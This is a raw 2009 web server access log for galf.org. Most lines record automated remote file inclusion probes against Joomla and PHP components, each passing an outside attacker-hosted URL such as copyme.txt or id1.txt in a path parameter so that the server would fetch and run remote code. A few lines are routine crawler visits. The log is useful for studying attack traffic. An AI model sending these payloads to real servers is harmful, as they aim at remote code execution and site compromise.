72.30.142.156 - - [28/Sep/2009:02:27:16 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:27:18 -0700] "GET /logs/access_090817.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:27:18 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:27:18 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:02:28:24 -0700] "GET /logs/access_090824.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:02:28:34 -0700] "GET /logs/access_090907.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:30:03 -0700] "GET /logs/access_090817.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:30:03 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:30:03 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:31:48 -0700] "GET /logs/access_090817.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:32:39 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:32:39 -0700] "GET /logs/access_090817.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:32:42 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:02:34:00 -0700] "GET /logs/access.log//errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [28/Sep/2009:02:34:00 -0700] "GET /errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [28/Sep/2009:02:34:00 -0700] "GET /logs//errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [28/Sep/2009:02:34:03 -0700] "GET /logs/access.log//errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [28/Sep/2009:02:34:03 -0700] "GET /errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [28/Sep/2009:02:34:03 -0700] "GET /logs//errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.115.89.7 - - [28/Sep/2009:02:34:33 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.kwmc.com/bbs/skin/ggambo7002_boardgallery//idmio.txt?%0D?? HTTP/1.1" 200 4799 "-" "libwww-perl/5.805" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:02:34:33 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.kwmc.com/bbs/skin/ggambo7002_boardgallery//idmio.txt?%0D?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:02:34:33 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://www.kwmc.com/bbs/skin/ggambo7002_boardgallery//idmio.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.187.131.186 - - [28/Sep/2009:02:34:45 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pipp0.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.187.131.186 - - [28/Sep/2009:02:34:45 -0700] "GET /logs/access_090420.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pipp0.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.187.131.186 - - [28/Sep/2009:02:34:45 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://pipp0.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:35:12 -0700] "GET /logs/access_090518.log/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:35:12 -0700] "GET /logs/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:35:15 -0700] "GET /?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:35:23 -0700] "GET /logs/access_090316.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:35:28 -0700] "GET /?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:35:28 -0700] "GET /logs/access_090518.log/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:35:31 -0700] "GET /logs/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:35:35 -0700] "GET /logs/access_090518.log/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:35:35 -0700] "GET /logs/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:35:35 -0700] "GET /?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:36:31 -0700] "GET /logs/access_090817.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:36:32 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.88 - - [28/Sep/2009:02:36:33 -0700] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:37:15 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:37:15 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:37:15 -0700] "GET /logs/access_090817.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [28/Sep/2009:02:37:24 -0700] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [28/Sep/2009:02:37:24 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [28/Sep/2009:02:37:25 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:37:45 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:37:45 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:37:45 -0700] "GET /logs/access_090817.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:37:59 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:38:09 -0700] "GET /logs/access_090316.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [28/Sep/2009:02:38:17 -0700] "GET /logs/access_090720.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:38:23 -0700] "GET /logs/access_090817.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.142.45.77 - - [28/Sep/2009:02:38:34 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.142.45.77 - - [28/Sep/2009:02:38:34 -0700] "GET /logs/access_090622.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.142.45.77 - - [28/Sep/2009:02:38:34 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.142.45.77 - - [28/Sep/2009:02:38:34 -0700] "GET /logs/access_090601.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:38:55 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:39:16 -0700] "GET /logs/access_090817.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:39:16 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:39:16 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:39:25 -0700] "GET /logs/access_090518.log/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:39:25 -0700] "GET /?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:39:25 -0700] "GET /logs/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
85.142.45.77 - - [28/Sep/2009:02:39:42 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.142.45.77 - - [28/Sep/2009:02:39:42 -0700] "GET /logs/access_090622.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.142.45.77 - - [28/Sep/2009:02:39:42 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.142.45.77 - - [28/Sep/2009:02:39:42 -0700] "GET /logs/access_090601.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:39:51 -0700] "GET /logs/access_090316.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.80.1.253 - - [28/Sep/2009:02:39:52 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "-" "www.galf.org"
206.80.1.253 - - [28/Sep/2009:02:39:52 -0700] "GET /logs/access_090112.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.galf.org"
74.86.24.26 - - [28/Sep/2009:02:40:34 -0700] "GET /logs/access_090406.log%20%20/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [28/Sep/2009:02:40:34 -0700] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [28/Sep/2009:02:40:34 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [28/Sep/2009:02:40:34 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.254.35.120 - - [28/Sep/2009:02:40:35 -0700] "GET /common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.254.35.120 - - [28/Sep/2009:02:40:35 -0700] "GET /logs//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.254.35.120 - - [28/Sep/2009:02:40:35 -0700] "GET /logs/access.log//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.86.24.26 - - [28/Sep/2009:02:41:17 -0700] "GET /logs/access_090406.log%20%20/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [28/Sep/2009:02:41:22 -0700] "GET /logs/access_090720.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:02:41:58 -0700] "GET /logs/access_090511.log//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:02:42:20 -0700] "GET /logs/access_090406.log//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:02:43:12 -0700] "GET /logs/access.log%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
217.173.25.215 - - [28/Sep/2009:02:44:27 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:45:08 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:45:08 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [28/Sep/2009:02:45:12 -0700] "GET /errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [28/Sep/2009:02:45:12 -0700] "GET /logs/access_090706.log%20%20//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [28/Sep/2009:02:45:12 -0700] "GET /logs//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:45:13 -0700] "GET /logs/access_090223.log%20%20/akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
195.210.57.83 - - [28/Sep/2009:02:45:58 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.galf.org"
195.210.57.83 - - [28/Sep/2009:02:45:58 -0700] "GET /logs/?D=A HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:46:52 -0700] "GET /logs/access_090223.log%20%20/akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:46:52 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:46:52 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [28/Sep/2009:02:46:56 -0700] "GET /logs/access_090706.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [28/Sep/2009:02:47:33 -0700] "GET /logs/access_090406.log%20%20/?sourcedir=http://parkinson.spb.ru/navig/copyme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [28/Sep/2009:02:47:50 -0700] "GET /logs/access_090831.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:47:54 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:47:54 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:47:54 -0700] "GET /logs/access_090309.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:47:56 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:47:56 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:47:56 -0700] "GET /logs/access_090309.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:47:59 -0700] "GET /logs/access_090720.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [28/Sep/2009:02:48:01 -0700] "GET /logs/access_090720.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:48:02 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:48:02 -0700] "GET /logs/access_090223.log%20%20/akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:48:03 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:48:33 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:48:33 -0700] "GET /logs/access_090223.log%20%20/akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [28/Sep/2009:02:48:37 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:52:13 -0700] "GET /logs/access_090824.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:52:13 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:52:13 -0700] "GET /logs/access_090824.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:52:13 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [28/Sep/2009:02:52:13 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:52:13 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:52:28 -0700] "GET /logs/access_090824.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.102.6.154 - - [28/Sep/2009:02:52:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
